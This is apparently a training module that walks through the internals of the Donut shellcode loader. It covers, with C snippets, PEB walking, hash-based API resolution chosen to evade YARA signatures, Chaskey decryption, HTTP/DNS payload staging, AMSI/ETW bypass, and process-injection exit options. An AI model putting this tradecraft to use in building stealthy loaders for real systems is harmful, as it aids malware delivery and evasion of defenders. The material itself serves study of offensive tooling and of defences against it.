Difficulty: Intermediate

Module 5: The Donut Loader

Inside the position-independent shellcode loader: PEB walking, API resolution, decryption, decompression, and module-type dispatch.

Module Objective

Trace the complete execution flow of Donut’s PIC loader from the moment shellcode begins executing. Understand how it finds its own data via RIP-relative addressing, resolves Windows APIs by walking the PEB and hashing export names, decrypts the instance and module, and dispatches to the correct payload handler.

1. Position-Independent Code Constraints

Donut’s loader must execute from any address in memory with zero external dependencies at startup. This means:

The loader is written in C and compiled with special flags to produce PIC output. The Donut build system compiles loader.c and its dependencies into a raw code blob that is position-independent.

2. Loader Entry Point

When the shellcode begins executing, the first thing the loader must do is find the DONUT_INSTANCE structure that follows the code. It uses a technique to determine its own address in memory:

C// The loader entry point in loader.c
// On x64, we can use RIP-relative addressing
// The DONUT_INSTANCE is appended immediately after the loader code

// Step 1: Determine our base address
// The instance offset is embedded as a constant during generation
PDONUT_INSTANCE inst = (PDONUT_INSTANCE)(
    (BYTE*)_ReturnAddress() + instance_offset
);

// On x86, a call/pop trick is used:
//   call $+5      ; push next instruction address
//   pop  eax      ; eax = current EIP
//   add  eax, offset  ; eax = address of DONUT_INSTANCE

Once the loader has a pointer to DONUT_INSTANCE, it has access to all configuration data, API hashes, and encryption keys.

3. PEB Walking for API Resolution

The core of PIC programming: finding loaded DLLs and their exports without calling any APIs. The Process Environment Block (PEB) contains a linked list of all loaded modules.

C// peb.c - Walk the PEB to find loaded DLLs and resolve exports

// Step 1: Access the PEB via the TEB
// x64: PEB is at gs:[0x60]
// x86: PEB is at fs:[0x30]
#if defined(_WIN64)
    PPEB peb = (PPEB)__readgsqword(0x60);
#else
    PPEB peb = (PPEB)__readfsdword(0x30);
#endif

// Step 2: Get the loader data (list of loaded modules)
PPEB_LDR_DATA ldr = peb->Ldr;

// Step 3: Walk the InMemoryOrderModuleList
// This doubly-linked list contains every loaded DLL
PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
PLIST_ENTRY entry = head->Flink;

while (entry != head) {
    PLDR_DATA_TABLE_ENTRY mod = CONTAINING_RECORD(
        entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks
    );

    // mod->BaseDllName is the DLL name (e.g., "kernel32.dll")
    // mod->DllBase is the base address of the loaded DLL
    // Now we can parse this DLL's export table...

    entry = entry->Flink;
}

PEB Walking Chain

TEB
gs:[0x60] (x64)
fs:[0x30] (x86)
PEB
Process Environment Block
PEB_LDR_DATA
Loader data
InMemoryOrderList
Linked list of DLLs
Export Table
Function addresses

4. Hash-Based Export Resolution

For each loaded DLL, the loader walks its Export Address Table (EAT) and computes a hash of each exported function name. When a hash matches one in the DONUT_INSTANCE.hash[] array, the function address is stored in the api structure.

C// Resolve exports from a DLL by hashing function names
VOID ResolveAPIs(PDONUT_INSTANCE inst, HMODULE dll) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)dll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)dll + dos->e_lfanew);

    PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(
        (BYTE*)dll + nt->OptionalHeader
            .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
    );

    DWORD *names    = (DWORD*)((BYTE*)dll + exp->AddressOfNames);
    WORD  *ordinals = (WORD*) ((BYTE*)dll + exp->AddressOfNameOrdinals);
    DWORD *funcs    = (DWORD*)((BYTE*)dll + exp->AddressOfFunctions);

    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        char *name = (char*)((BYTE*)dll + names[i]);

        // Compute hash of this export name
        ULONGLONG hash = ComputeHash(name);

        // Check against all hashes in the instance
        for (DWORD j = 0; j < DONUT_MAX_API; j++) {
            if (inst->hash[j] == hash) {
                // Found a match! Store the resolved address
                WORD ord = ordinals[i];
                FARPROC addr = (FARPROC)((BYTE*)dll + funcs[ord]);
                ((FARPROC*)&inst->api)[j] = addr;
            }
        }
    }
}

The Hashing Algorithm

Donut uses a custom hash function (Maru hash) that combines the DLL name and function name into a single 64-bit value. This ensures that kernel32!VirtualAlloc and ntdll!VirtualAlloc (hypothetically) would produce different hashes. The hash includes both the DLL name and the function name to avoid collisions across modules.

5. Instance Decryption

After resolving the minimum required APIs, the loader decrypts the DONUT_INSTANCE. The decryption key is derived from a value embedded in the loader code at generation time:

C// Decrypt the DONUT_INSTANCE using Chaskey CTR mode
// The initial key and counter are stored in the loader code itself
chaskey_encrypt(
    inst->key,       // Chaskey key (128-bit)
    inst->ctr,       // Counter/nonce (128-bit)
    (BYTE*)inst + offsetof(DONUT_INSTANCE, /* encrypted start */),
    encrypted_size
);

// Verify integrity via MAC
DWORD mac = ComputeMAC(inst, inst_size);
if (mac != inst->mac) {
    // Decryption failed or data corrupted - abort
    return;
}

Once decrypted, the instance reveals the full API hash table, the module decryption key, bypass configuration, and all other runtime parameters.

6. Module Decryption and Decompression

With the instance decrypted and APIs resolved, the loader proceeds to decrypt and decompress the DONUT_MODULE:

C// Locate the module (either embedded or downloaded via staging)
PDONUT_MODULE mod;

if (inst->type == DONUT_INSTANCE_EMBED) {
    // Module is embedded after the instance
    mod = (PDONUT_MODULE)((BYTE*)inst + inst->mod_offset);
} else {
    // Download the module via HTTP or DNS staging
    mod = DownloadModule(inst);
}

// Decrypt the module with the module-specific key
chaskey_encrypt(
    inst->mod_key,
    inst->mod_ctr,
    (BYTE*)mod,
    inst->mod_len
);

// Decompress based on the compression engine
LPVOID payload = NULL;
if (mod->compress == DONUT_COMPRESS_APLIB) {
    payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
    aP_depack(mod->data, payload);
} else if (mod->compress == DONUT_COMPRESS_LZNT1) {
    payload = inst->api.VirtualAlloc(NULL, mod->len, MEM_COMMIT, PAGE_READWRITE);
    ULONG final_size;
    inst->api.RtlDecompressBuffer(
        COMPRESSION_FORMAT_LZNT1,
        payload, mod->len,
        mod->data, mod->zlen,
        &final_size
    );
} else {
    // No compression: data is the raw payload
    payload = mod->data;
}

7. Module-Type Dispatch

After decryption and decompression, the loader checks the module type and calls the appropriate handler:

C// Dispatch based on module type
switch (mod->type) {
    case DONUT_MODULE_NET_DLL:
    case DONUT_MODULE_NET_EXE:
        // .NET payload: host CLR, load assembly, invoke
        RunDotNET(inst, mod, payload);
        break;

    case DONUT_MODULE_DLL:
    case DONUT_MODULE_EXE:
        // Native PE: map sections, relocate, resolve imports, execute
        RunPE(inst, mod, payload);
        break;

    case DONUT_MODULE_VBS:
    case DONUT_MODULE_JS:
    case DONUT_MODULE_XSL:
        // Script: create COM scripting engine, execute
        RunScript(inst, mod, payload);
        break;
}

Complete Loader Execution Flow

Find Instance
RIP-relative
PEB Walk
Resolve APIs
Decrypt Instance
Chaskey
AMSI/ETW Bypass
Patch stubs
Decrypt Module
Chaskey
Decompress
aPLib/LZNT1
Dispatch
PE/CLR/COM

8. Exit Handling

After the payload finishes executing, the loader must clean up and exit. The exit behavior is configurable via DONUT_INSTANCE.exit_opt:

Exit OptionConstantBehavior
Exit ThreadDONUT_OPT_EXIT_THREADCalls ExitThread(0) — only the current thread terminates
Exit ProcessDONUT_OPT_EXIT_PROCESSCalls ExitProcess(0) — the entire process terminates
No ExitDONUT_OPT_EXIT_BLOCKThe loader returns normally, allowing the caller to continue

Exit Option Matters

Choosing the wrong exit option can crash the target process or leave zombie threads. Exit Thread is safest for injection scenarios (the host process continues). Exit Process is useful for sacrificial processes. No Exit / Block is best when the loader is called from your own code and you want control to return.

Knowledge Check

1. How does the PIC loader find loaded DLLs without calling any Windows APIs?

The PEB (accessed via gs:[0x60] on x64 or fs:[0x30] on x86) contains a pointer to PEB_LDR_DATA, which has a linked list of all loaded modules. The loader traverses this list to find DLLs like kernel32.dll and ntdll.dll, then parses their export tables.

2. Why does Donut use hash-based API resolution instead of plaintext strings?

Plaintext API strings like "VirtualAlloc" or "CreateRemoteThread" in shellcode are trivial to detect with static analysis and YARA rules. By storing only hashes, Donut avoids these signatures. The loader computes hashes of export names at runtime and compares them against the pre-computed values.

3. What is the first thing the Donut loader must do after execution begins?

The loader cannot do anything useful until it finds the DONUT_INSTANCE, which contains all configuration data, API hashes, and encryption keys. It locates the instance using RIP-relative addressing (x64) or a call/pop trick (x86) combined with a known offset.